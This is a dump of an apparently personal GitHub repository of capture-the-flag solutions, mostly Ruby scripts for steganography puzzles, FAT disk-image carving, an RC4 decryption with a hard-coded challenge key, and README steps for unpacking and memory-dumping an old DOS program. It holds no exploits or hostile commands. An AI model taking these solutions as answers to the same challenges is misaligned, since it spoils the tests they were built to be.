18 |   h.times do |y|
19 |     a = images.map{ |img| img[x,y] }
20 |     if a.uniq.size != 1
21 |       sugar[x,y] = :black
22 |       #printf "%3d %3d : %d\n",x,y, a.uniq.size
23 |       #p a.map{ |x| x.r & 1 }.join
24 |     end
25 |   end
26 | end
27 | 
28 | sugar.save "sugar.png"
29 | 
30 | system "zsteg sugar.png"
31 | 


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/sugar.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/sugar.png


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/task-0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/task-0.png


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/task-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/task-1.png


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/task-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/task-2.png


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/task-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/task-3.png


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/task-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/task-4.png


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/task-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/task-5.png


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/task-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/task-6.png


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/task-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/task-7.png


--------------------------------------------------------------------------------
/2014.ructf-quals/100.steg.cats_eye/task.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/100.steg.cats_eye/task.gif


--------------------------------------------------------------------------------
/2014.ructf-quals/200.reversing.no_harm/HARM.DAT:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/200.reversing.no_harm/HARM.DAT


--------------------------------------------------------------------------------
/2014.ructf-quals/200.reversing.no_harm/README:
--------------------------------------------------------------------------------
 1 | task: find an md5 digest of the biggest file from harm.dat of harm0597 discmag
 2 | 
 3 | Prerequisites
 4 | -------------
 5 |  1. find harm0597.zip
 6 |  2. unpack harm.exe with cup386
 7 |  3. fix Runtime Error 200 with crtfix16.zip
 8 | 
 9 | Facts
10 | -------------
11 |  1. biggest file is a "trx-drnk.rus"
12 |  2. "Runtime Error 103" is a joke, just wait
13 | 
14 | Solution #1
15 | -------------
16 |  1. get DosBox
17 |  2. run harm.exe
18 |  3. open Articles/TRX Gathering Report
19 |  4. dump DosBox memory ( linux / win7 = OK; OSX - ? )
20 |  5. find article body in dump, carefully guessing its start/end
21 |  6. calculate md5
22 | 
23 | Solution #2
24 | -------------
25 |  1. get IDA + DosBox with integrated debugger
26 |  2. identify unpacking function
27 |  3. breakpoint it
28 |  4. catch a moment when "trx-drnk.rus" is being loaded
29 |  5. dump it just after it's been unpacked
30 |  6. calculate md5
31 | 


--------------------------------------------------------------------------------
/2014.ructf-quals/200.reversing.no_harm/harm.unpacked.fixed.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/200.reversing.no_harm/harm.unpacked.fixed.exe


--------------------------------------------------------------------------------
/2014.ructf-quals/200.reversing.no_harm/harm0597.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/200.reversing.no_harm/harm0597.zip


--------------------------------------------------------------------------------
/2014.ructf-quals/200.reversing.no_harm/trx-drnk.rus:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/200.reversing.no_harm/trx-drnk.rus


--------------------------------------------------------------------------------
/2014.ructf-quals/300.admin.strange_image/answer.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/300.admin.strange_image/answer.jpg


--------------------------------------------------------------------------------
/2014.ructf-quals/300.admin.strange_image/brute.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | #coding: binary
 3 | require './_common.rb'
 4 | 
 5 | fname = ARGV.first || "task.ima"
 6 | io    = File.open fname, "rb"
 7 | @disk = Disk.new io
 8 | 
 9 | #chain = @disk.fats[0].get_chain(1654)
10 | chain = [1654, 662, 1092, 1146, 2127, 2832, 1213, 1098]
11 | data0 = chain.map{ |cluster_id| @disk.cluster(cluster_id) }.join
12 | 
13 | STDOUT.sync = true
14 | 
15 | fnames = []
16 | @disk.each_cluster do |data,idx|
17 |   fname = "brute.#{idx}.jpg"
18 |   fnames << fname
19 |   File.open("out/#{fname}", "wb") do |io|
20 |     io << data0
21 |     io << data
22 |   end
23 |   system "convert out/#{fname} out_png/#{fname.sub('jpg','png')}"
24 |   putc '.'
25 | end
26 | 
27 | html_idx = 0
28 | fnames.each_slice(1000) do |slice|
29 |   html = ''
30 |   slice.each do |fname|
31 |     html << "\n"
32 |   end
33 |   html_fname = "out/#{html_idx}.html"
34 |   puts "[=] #{html_fname}"
35 |   File.write html_fname, html
36 |   html_idx += 1
37 | end
38 | 
39 | 


--------------------------------------------------------------------------------
/2014.ructf-quals/300.admin.strange_image/extract_chain.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | #coding: binary
 3 | require './_common.rb'
 4 | 
 5 | fname = ARGV.first || "task.ima"
 6 | io    = File.open fname, "rb"
 7 | @disk = Disk.new io
 8 | 
 9 | ios = @disk.fats.size.times.map{ |idx| File.new("chain.fat#{idx+1}.jpg","wb") }
10 | @disk.fats.each_with_index do |fat,idx|
11 |   chain = fat.get_chain 1654
12 |   chain.each do |cluster_id|
13 |     ios[idx] << @disk.cluster(cluster_id)
14 |   end
15 | end
16 | ios.each(&:close)
17 | 


--------------------------------------------------------------------------------
/2014.ructf-quals/300.admin.strange_image/find_ffd9.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | #coding: binary
 3 | require './_common.rb'
 4 | require 'awesome_print'
 5 | 
 6 | fname = ARGV.first || "task.ima"
 7 | io    = File.open fname, "rb"
 8 | @disk = Disk.new io
 9 | 
10 | @disk.each_cluster do |data,idx|
11 |   if data["\xff\xd9"]
12 |     puts "cluster ##{idx}".green
13 |     ZHexdump.dump data
14 |     puts
15 |   end
16 | end
17 | 


--------------------------------------------------------------------------------
/2014.ructf-quals/300.admin.strange_image/lschain.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | require './_common.rb'
 3 | 
 4 | fname = ARGV.first || "task.ima"
 5 | io    = File.open fname, "rb"
 6 | @disk = Disk.new io
 7 | 
 8 | @disk.fats.each do |fat|
 9 |   p fat.get_chain 1654
10 | end
11 | 


--------------------------------------------------------------------------------
/2014.ructf-quals/300.admin.strange_image/task.ima:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/300.admin.strange_image/task.ima


--------------------------------------------------------------------------------
/2014.ructf-quals/300.admin.strange_image/test_png.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | require 'zpng'
 3 | 
 4 | def process_file fname
 5 |   img = ZPNG::Image.load fname
 6 |   if img[181,30].to_grayscale > 220 && img[197,30].to_grayscale > 220
 7 |     @html << "\n"
 8 |   end
 9 | end
10 | 
11 | STDOUT.sync = true
12 | 
13 | @html = ''
14 | ARGV.each do |fname|
15 |   putc '.'
16 |   process_file fname
17 | end
18 | File.write "png_out.html", @html
19 | 


--------------------------------------------------------------------------------
/2014.ructf-quals/300.steg.nyan-task/nyan-task.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/300.steg.nyan-task/nyan-task.png


--------------------------------------------------------------------------------
/2014.ructf-quals/300.steg.nyan-task/solve.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | #coding: utf-8
 3 | require 'zpng'
 4 | 
 5 | img  = ZPNG::Image.load "nyan-task.png"
 6 | plte = img.plte
 7 | 
 8 | puts
 9 | puts "this is a DataMatrix code, see http://ru.wikipedia.org/wiki/Data_Matrix"
10 | puts
11 | 
12 | s = '  '
13 | plte.to_a.each_slice(16) do |slice|
14 |   puts '  ' + slice.map{ |c| c == plte[0] ? '██' : '  ' }.join
15 | end
16 | puts
17 | 


--------------------------------------------------------------------------------
/2014.ructf-quals/500.reversing.arcfour/arcfour.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/500.reversing.arcfour/arcfour.exe


--------------------------------------------------------------------------------
/2014.ructf-quals/500.reversing.arcfour/arcfour.patched.loop.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2014.ructf-quals/500.reversing.arcfour/arcfour.patched.loop.exe


--------------------------------------------------------------------------------
/2014.ructf-quals/500.reversing.arcfour/solve.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | #coding: binary
 3 | require 'rc4' # ruby-rc4 gem
 4 | 
 5 | KEY = '0h,NiC3_k3Y'
 6 | 
 7 | ENCRYPTED = <<-EOF.strip.split.map{ |x| x.to_i(16).chr }.join
 8 |   CA C8 C7 03 FC 10 28 1F 7A 7F 8C 94 2E F9 69 24
 9 |   9F 7D 27 C1 C4 09 45 7F 75 EE 45 97 8D AF 79 1F
10 | EOF
11 | 
12 | decrypted = RC4.new(KEY).decrypt(ENCRYPTED)
13 | p decrypted 
14 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 | === some useful links
3 | 
4 | * http://pwnypack.readthedocs.io/en/latest/
5 | * https://github.com/onethawt/idaplugins-list
6 | 


--------------------------------------------------------------------------------
/bright-shadows.net/stegano_30_the_coast_guard/1_img2text.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | require 'zpng'
 3 | 
 4 | img = ZPNG::Image.load "stegano33.png"
 5 | 
 6 | # extract every 50-th pixel
 7 | a = []
 8 | img.pixels.each_with_index do |c,idx|
 9 |   if idx%50 == 0
10 |     a << c
11 |   end
12 | end
13 | 
14 | # last pixel is a lie
15 | a.pop
16 | 
17 | # note that there's 27 unique colors - letters A..Z + space
18 | #p a.uniq.size
19 | 
20 | # try to stupidly convert colors to a letters
21 | r = ''
22 | h = {}
23 | char = 'A'
24 | a.each do |c|
25 |   if c.black?
26 |     s = " "
27 |   elsif h[c]
28 |     s = h[c]
29 |   else
30 |     raise char if char.size > 1
31 |     s = h[c] = char.dup
32 |     char.succ!
33 |     s
34 |   end
35 |   r << s
36 | end
37 | 
38 | puts r
39 | 


--------------------------------------------------------------------------------
/bright-shadows.net/stegano_30_the_coast_guard/3_decode.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | text = File.read "2.txt"
 4 | 
 5 | # http://www.blisstonia.com/software/WebDecrypto/index.php
 6 | 
 7 | known = " WANT IT TO MEAN SOMETHING OR NOT YOU COULD THINK THAT THE SOLUTION IS HIDDEN IN THIS NONSENSE ALPHABET "
 8 | 
 9 | # manually assigned, using eyes(tm)
10 | repl_from = 'UJMNAVG'
11 | repl_to   = 'RXVFQJZ'
12 | 
13 | text.scan(Regexp.new(known.gsub(/[a-z]/i,'.'))).each do |decoded_part|
14 |   puts known.inspect
15 |   puts decoded_part.inspect
16 |   puts
17 |   known.size.times do |i|
18 |     next if known[i] == ' '
19 |     next if repl_to[known[i]]
20 |     repl_from << decoded_part[i]
21 |     repl_to   << known[i]
22 |   end
23 | 
24 |   # debug output to be sure that both replacement strings contain all A-Z chars
25 |   p [repl_from, repl_to]
26 |   p [repl_from.size, repl_to.size]
27 |   p repl_from.chars.sort.join
28 |   p repl_to.chars.sort.join
29 |   puts
30 | 
31 |   # final result
32 |   puts text.tr(repl_from, repl_to)
33 | end
34 | 


--------------------------------------------------------------------------------
/bright-shadows.net/stegano_30_the_coast_guard/README.md:
--------------------------------------------------------------------------------
 1 | [Stegano 30: "The coast guard"][task_url]
 2 | ==============================
 3 | 
 4 | Task
 5 | ----
 6 | 
 7 | Use [this key] and decode the stegano:
 8 | 
 9 | ![The stegano.][image]
10 | 
11 | 
12 | Solution
13 | --------
14 | 
15 | 1. `1_img2text.rb`
16 | 2. paste a part of text into a [WebDecrypto] and get some readable output out of it
17 | 3. `3_decode.rb`
18 | 
19 | [task_url]:    http://www.bright-shadows.net/challenges/stegano/halaman_coastguard/
20 | [this key]:    http://www.bright-shadows.net/challenges/stegano/halaman_coastguard/the_key.png
21 | [image]:       http://www.bright-shadows.net/challenges/stegano/halaman_coastguard/stegano33.png
22 | [WebDecrypto]: http://www.blisstonia.com/software/WebDecrypto/index.php
23 | 


--------------------------------------------------------------------------------
/bright-shadows.net/stegano_30_the_coast_guard/stegano33.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/bright-shadows.net/stegano_30_the_coast_guard/stegano33.png


--------------------------------------------------------------------------------
/bright-shadows.net/stegano_30_the_coast_guard/the_key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/bright-shadows.net/stegano_30_the_coast_guard/the_key.png


--------------------------------------------------------------------------------
/docs/Python arsenal for RE.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/docs/Python arsenal for RE.pdf


--------------------------------------------------------------------------------
/hackquest.com/steg-double-possibilities/1-png2text.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | require 'zpng'
 3 | #require 'hexdump'
 4 | 
 5 | 
 6 | def process_file fname
 7 |   c0 = ZPNG::Color.new 0xd4, 0xd0, 0xc8
 8 | 
 9 |   bits = []
10 | 
11 |   img = ZPNG::Image.load fname
12 |   img.pixels.each do |c|
13 |     bits << (c == c0 ? 1 : 0)
14 |   end
15 | 
16 |   data = bits.each_slice(8).to_a.map(&:join).map{ |x| x.to_i(2).chr }.join
17 |   #Hexdump.dump data
18 |   print data
19 | end
20 | 
21 | #ARGV.each do |fname|
22 | #  process_file fname
23 | #end
24 | 
25 | process_file 'challenge.png'
26 | 


--------------------------------------------------------------------------------
/hackquest.com/steg-double-possibilities/5.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | data = File.read "4.txt"
 4 | 
 5 | text = ''
 6 | data.split.each do |word|
 7 |   if word == 'between'
 8 |     text << ' '
 9 |   else
10 |     text << word[0,1]
11 |   end
12 | end
13 | 
14 | puts text
15 | 


--------------------------------------------------------------------------------
/hackquest.com/steg-double-possibilities/7-answer.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | r = ''
 4 | File.read("6.txt").split.last.bytes.each do |x|
 5 |   x += 2
 6 |   x -= 26 if x > 'z'.ord
 7 |   r << x.chr
 8 | end
 9 | puts r
10 | 


--------------------------------------------------------------------------------
/hackquest.com/steg-double-possibilities/challenge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/hackquest.com/steg-double-possibilities/challenge.png


--------------------------------------------------------------------------------
/stuff/counter.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/stuff/counter.gif


--------------------------------------------------------------------------------
/stuff/decompyle.patch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/stuff/decompyle.patch


--------------------------------------------------------------------------------
/tools/clicker.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | KEYS = "58374612"
 4 | 
 5 | def push num
 6 |   y = 480 + 51*(num.to_i-1)
 7 |   system "xdotool search --name xp mousemove 440 #{y} mousedown 1 sleep 0.25 mouseup 1"
 8 |   sleep 0.25
 9 | end
10 | 
11 | KEYS.split('').each do |key|
12 |   push key
13 | end
14 | 


--------------------------------------------------------------------------------